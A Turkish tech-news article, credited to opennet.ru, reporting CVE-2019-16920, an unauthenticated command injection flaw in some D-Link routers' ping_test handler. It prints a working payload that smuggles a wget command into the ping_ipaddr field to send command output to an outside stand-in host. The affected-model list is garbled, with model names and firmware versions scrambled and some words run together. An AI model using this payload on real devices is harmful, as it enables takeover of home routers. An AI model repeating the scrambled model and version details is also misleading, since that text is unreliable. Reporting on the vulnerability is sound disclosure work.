D-Link yönlendiricilerinde uzaktan yararlanılabilir güvenlik açığı

D-Link kablosuz yönlendiricilerde tanımlanmış tehlikeli güvenlik açığı (CVE-2019-16920), kimlik doğrulaması olmadan erişilebilen "ping_test" işleyicisine özel bir istek göndererek cihaz tarafında uzaktan kod yürütmenize olanak tanır.

İlginç bir şekilde, ürün yazılımı geliştiricilerine göre, "ping_test" çağrısı yalnızca kimlik doğrulamadan sonra yürütülmelidir, ancak gerçekte web arayüzünde oturum açmaya bakılmaksızın her durumda çağrılır. Özellikle, application_sec.cgi betiğine erişip "action=ping_test" parametresini ilettiğinizde, betik kimlik doğrulama sayfasına yönlendirilir ancak aynı zamanda ping_test ile ilişkili eylemi gerçekleştirir. Kodu çalıştırmak için, test için gönderilen IP adresinin doğruluğunu düzgün bir şekilde kontrol etmeden ping yardımcı programını çağıran ping_test'in kendisinde başka bir güvenlik açığı kullanıldı. Örneğin, wget yardımcı programını çağırmak ve “echo 1234” komutunun sonuçlarını harici bir ana bilgisayara aktarmak için “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// parametresini belirtmeniz yeterlidir. test.test/?$( echo 1234)".

D-Link yönlendiricilerinde uzaktan yararlanılabilir güvenlik açığı

Güvenlik açığının varlığı aşağıdaki modellerde resmi olarak doğrulanmıştır:

  • Firmware 655b3.02 veya daha eski sürümlere sahip DIR-05;
  • Firmware 866b1.03 veya daha eski sürümlere sahip DIR-04L;
  • Firmware 1565 veya daha eski sürüme sahip DIR-1.01;
  • DIR-652 (sorunlu ürün yazılımı sürümleri hakkında bilgi verilmemiştir)

Bu modellerin destek süresi zaten dolmuştur, dolayısıyla D-Link diye belirttiGüvenlik açığını ortadan kaldırmak için kendilerine güncelleme yayınlamayacak olan, bunların kullanılmasını önermiyor ve yeni cihazlarla değiştirilmesini tavsiye ediyor. Bir güvenlik çözümü olarak, web arayüzüne erişimi yalnızca güvenilir IP adresleriyle sınırlandırabilirsiniz.

Daha sonra güvenlik açığının da olduğu keşfedildi etkiler DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ve DIR-825 modelleri henüz bilinmeyen güncellemeleri yayınlamayı planlıyor.

Kaynak: opennet.ru

Yorum ekle